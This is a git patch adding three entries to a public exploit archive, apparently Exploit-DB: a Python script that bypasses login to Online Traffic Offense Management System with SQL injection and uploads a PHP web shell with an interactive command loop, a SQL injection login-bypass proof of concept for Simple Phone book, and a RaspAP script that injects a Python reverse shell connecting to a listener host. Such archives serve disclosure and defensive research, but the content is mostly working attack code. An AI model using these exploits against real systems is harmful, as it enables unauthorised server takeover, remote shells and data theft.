From 1e25d5703078b60c56665d8f9f070ecba7413269 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 24 Aug 2021 05:01:53 +0000 Subject: [PATCH] DB: 2021-08-24 3 changes to exploits/shellcodes Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated) RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated) --- exploits/php/webapps/50221.py | 121 +++++++++++++++++++++++++++++++++ exploits/php/webapps/50223.txt | 25 +++++++ exploits/php/webapps/50224.py | 45 ++++++++++++ files_exploits.csv | 3 + 4 files changed, 194 insertions(+) create mode 100755 exploits/php/webapps/50221.py create mode 100644 exploits/php/webapps/50223.txt create mode 100755 exploits/php/webapps/50224.py diff --git a/exploits/php/webapps/50221.py b/exploits/php/webapps/50221.py new file mode 100755 index 000000000..c426e9bf9 --- /dev/null +++ b/exploits/php/webapps/50221.py @@ -0,0 +1,121 @@ +# Exploit Title: Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 20-08-2021 +# Exploit Author: Halit AKAYDIN (hLtAkydn) +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html +# Version: V1 +# Category: Webapps +# Tested on: Linux/Windows + +# Online Traffic Offense Management System +# contains a file upload vulnerability that allows for remote +# code execution against the target. This exploit requires +# the user to be authenticated, but a SQL injection in the login form +# allows the authentication controls to be bypassed +# File uploaded from "/admin/?page=user" has no validation check +# and the directory it is placed in allows for execution of PHP code. + + +""" +(hltakydn@SpaceSec)-[~/Exploits-db/traffic_offense] +$ python2 exploit.py + +Example: http://example.com + +Url: http://trafficoffense.com + +[?] Check Adress + +[+] Bypass Login + +[+] Upload Shell + +[+] Exploit Done! + +$ whoami +www-data + +$ id +uid=33(www-data) gid=33(www-data) groups=33(www-data) + +$ pwd +/var/www/html/uploads + +$ + +""" + + + +#!/usr/bin/env python2 +import requests +import time +from bs4 import BeautifulSoup + +print ("\nExample: http://example.com\n") + +url = raw_input("Url: ") +payload_name = "evil.php" +payload_file = "'; $cmd = ($_GET['cmd']); system($cmd); echo ''; die; } ?>" + +if url.startswith(('http://', 'https://')): + print "Check Url ...\n" +else: + print "\n[?] Check Adress\n" + url = "http://" + url + +try: + response = requests.get(url) +except requests.ConnectionError as exception: + print("[-] Address not reachable") + sys.exit(1) + +session = requests.session() + +request_url = url + "/classes/Login.php?f=login" +post_data = {"username": "'' OR 1=1-- '", "password": "'' OR 1=1-- '"} +bypass_user = session.post(request_url, data=post_data) + + +if bypass_user.text == '{"status":"success"}': + print ("[+] Bypass Login\n") + cookies = session.cookies.get_dict() + req = session.get(url + "/admin/?page=user") + parser = BeautifulSoup(req.text, 'html.parser') + userid = parser.find('input', {'name':'id'}).get("value") + firstname = parser.find('input', {'id':'firstname'}).get("value") + lastname = parser.find('input', {'id':'lastname'}).get("value") + username = parser.find('input', {'id':'username'}).get("value") + + request_url = url + "/classes/Users.php?f=save" + headers = {"sec-ch-ua": "\";Not A Brand\";v=\"99\", \"Chromium\";v=\"88\"", "Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryxGKa5dhQCRwOodsq", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} + data = "------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ userid +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+ firstname +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+ lastname +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+ username +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+ payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n" + payload_file +"\n\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq--\r\n" + upload = session.post(request_url, headers=headers, cookies=cookies, data=data) + time.sleep(2) + + if upload.text == "1": + print ("[+] Upload Shell\n") + time.sleep(2) + req = session.get(url + "/admin/?page=user") + parser = BeautifulSoup(req.text, 'html.parser') + find_shell = parser.find('img', {'id':'cimg'}) + print ("[+] Exploit Done!\n") + + while True: + cmd = raw_input("$ ") + headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36'} + request = requests.post(find_shell.get("src") + "?cmd=" + cmd, data={'key':'value'}, headers=headers) + print request.text.replace("
" ,"").replace("
", "") + time.sleep(1) + + elif upload.text == "2": + print ("[-] Try the manual method") + request_url = url + "/classes/Login.php?f=logout" + cookies = session.cookies.get_dict() + headers = {"sec-ch-ua": "\";Not A Brand\";v=\"99\", \"Chromium\";v=\"88\"", "sec-ch-ua-mobile": "?0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} + session.get(request_url, headers=headers, cookies=cookies) + else: + print("[!]An unknown error") + +else: + print ("[-] Failed to bypass login panel") \ No newline at end of file diff --git a/exploits/php/webapps/50223.txt b/exploits/php/webapps/50223.txt new file mode 100644 index 000000000..b8bc3d0c0 --- /dev/null +++ b/exploits/php/webapps/50223.txt @@ -0,0 +1,25 @@ +# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated) +# Date: 21/08/2021 +# Exploit Author: Justin White +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html +# Version: 1.0 +# Testeted on: Linux (Ubuntu 20.04) using LAMPP + +## SQL Injection + +# Vulnerable page +http://localhost/PhoneBook/index.php + +# Vulnerable paramater +username1 & password + +# POC +Username = ' or sleep(5)='-- - +Password = ' ' + +Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -" + +# Vulnerable Code +index.php line 13 +$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'"); \ No newline at end of file diff --git a/exploits/php/webapps/50224.py b/exploits/php/webapps/50224.py new file mode 100755 index 000000000..c1fc1a76e --- /dev/null +++ b/exploits/php/webapps/50224.py @@ -0,0 +1,45 @@ +# Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated) +# Date: 23.08.2021 +# Exploit Author: Moritz Gruber +# Vendor Homepage: https://raspap.com/ +# Software Link: https://github.com/RaspAP/raspap-webgui +# Version: 2.6.6 +# Tested on: Linux raspberrypi 5.10.52-v7+ + +import requests +from requests.api import post +from requests.auth import HTTPBasicAuth +from bs4 import BeautifulSoup +import sys, re + +if len(sys.argv) != 7: + print("python3 exec-raspap.py ") + sys.exit() +else: + target_host = sys.argv[1] + target_port = sys.argv[2] + username = sys.argv[3] + password = sys.argv[4] + listener_host = sys.argv[5] + listener_port = sys.argv[6] + + endpoint = "/wpa_conf" + exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" + url = "http://{}:{}/{}".format(target_host,target_port,endpoint) + + s = requests.Session() + + get_Request = s.get(url, auth=HTTPBasicAuth(username, password)) + soup = BeautifulSoup(get_Request.text, "lxml") + csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content") + + post_data = { + "csrf_token": csrf_token, + "connect": "wlan; {}".format(exploit) + } + post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password)) + if post_Request.status_code: + print("Exploit send.") + else: + print("Something went wrong.") + print("Done") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 19b801440..6ef3cd286 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44347,3 +44347,6 @@ id,file,description,date,author,type,platform,port 50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",2021-08-18,"Halit AKAYDIN",webapps,php, 50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",2021-08-19,"Davide Taraschi",webapps,php, 50220,exploits/php/webapps/50220.txt,"Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-08-20,"Azumah Foresight Xorlali",webapps,php, +50221,exploits/php/webapps/50221.py,"Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-23,"Halit AKAYDIN",webapps,php, +50223,exploits/php/webapps/50223.txt,"Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)",2021-08-23,"Justin White",webapps,php, +50224,exploits/php/webapps/50224.py,"RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)",2021-08-23,"Moritz Gruber",webapps,php,